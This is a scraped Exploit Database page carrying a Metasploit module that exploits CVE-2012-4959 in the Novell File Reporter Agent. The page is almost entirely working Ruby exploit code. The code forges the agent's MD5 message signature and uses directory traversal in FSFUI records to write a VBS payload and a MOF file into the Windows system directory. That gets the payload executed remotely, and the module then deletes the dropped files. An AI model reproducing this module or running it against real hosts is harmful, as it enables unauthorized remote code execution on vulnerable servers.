Novell File Reporter (NFR) Agent FSFUI Record – Arbitrary File Upload / Remote Code Execution (Metasploit)

• Exploit Database
• 166 阅读

• 作者： Metasploit
  日期： 2012-11-19
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/22787/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150

  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking   include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::WbemExec   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;NFR Agent FSFUI Record File Upload RCE&apos;, &apos;Description&apos;=> %q{ NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload arbitrary files via a directory traversal while handling requests to /FSF/CMD with FSFUI records with UICMD 130. This module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1). }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;juan vazquez&apos; ], &apos;References&apos; => [ [ &apos;CVE&apos;, &apos;CVE-2012-4959&apos;], [ &apos;URL&apos;, &apos;https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959&apos; ] ], &apos;Payload&apos;=> { &apos;Space&apos; => 2048, &apos;StackAdjustment&apos; => -3500 }, &apos;DefaultOptions&apos; => { &apos;WfsDelay&apos; => 20 }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ #Windows before Vista [ &apos;Automatic&apos;, { } ] ], &apos;DefaultTarget&apos;=> 0, &apos;DisclosureDate&apos; => &apos;Nov 16 2012&apos;))   register_options( [ Opt::RPORT(3037), OptBool.new(&apos;SSL&apos;, [true, &apos;Use SSL&apos;, true]), OptInt.new(&apos;DEPTH&apos;, [true, &apos;Traversal depth&apos;, 6]) ], self.class)   end   def on_new_session(client)   return if not @var_mof_name return if not @var_vbs_name   if client.type != "meterpreter" print_error("NOTE: you must use a Meterpreter payload in order to automatically clean up.") print_error("The following files must be removed manually:") print_error("The VBS payload: %WINDIR%\\system32\\#{@var_vbs_name}.vbs") print_error("The MOF file (%WINDIR%\\system32\\wbem\\mof\\good\\#{@var_mof_name}.mof)") return # That&apos;s it end   # stdapi must be loaded before we can use fs.file client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")   begin print_good("Deleting the VBS payload \"#{@var_vbs_name}.vbs\" ...") windir = client.fs.file.expand_path("%WINDIR%") client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs") print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...") cmd = "#{windir}\\system32\\attrib.exe -r " + "#{windir}\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof" client.sys.process.execute(cmd, nil, {&apos;Hidden&apos; => true }) client.fs.file.rm("#{windir}\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof") rescue ::Exception => e print_error("Exception: #{e.inspect}") end   end   def peer "#{rhost}:#{rport}" end   def exploit   # In order to save binary data to the file system the payload is written to a .vbs # file and execute it from there. @var_mof_name = rand_text_alpha(rand(5)+5) @var_vbs_name = rand_text_alpha(rand(5)+5)   print_status("Encoding payload into VBS...") payload = generate_payload_exe vbs_content = Msf::Util::EXE.to_exe_vbs(payload)   print_status("Generating VBS file...") mof_content = generate_mof("#{@var_mof_name}.mof", "#{@var_vbs_name}.vbs")   print_status("#{peer} - Uploading the VBS file") worked = upload_file("WINDOWS\\system32\\#{@var_vbs_name}.vbs", vbs_content) unless worked fail_with(Failure::NotVulnerable, "Failed to upload the file") end   print_status("#{peer} - Uploading the MOF file") upload_file("WINDOWS\\system32\\wbem\\mof\\#{@var_mof_name}.mof", mof_content) end   def upload_file(filename, content) traversal = "..\\" * datastore[&apos;DEPTH&apos;] traversal << filename   record = "<RECORD><NAME>FSFUI</NAME><UICMD>130</UICMD><FILE>#{traversal}</FILE><![CDATA[#{content}]]></RECORD>" md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record   res = send_request_cgi( { &apos;uri&apos; => &apos;/FSF/CMD&apos;, &apos;version&apos; => &apos;1.1&apos;, &apos;method&apos;=> &apos;POST&apos;, &apos;ctype&apos; => "text/xml", &apos;data&apos;=> message, })   if res and res.code == 200 and res.body.include? "<RESULT><VERSION>1</VERSION><STATUS>0</STATUS></RESULT>" print_warning("#{peer} - File successfully uploaded: #{filename}") else print_error("#{peer} - Failed to upload the file") return false end   true end   end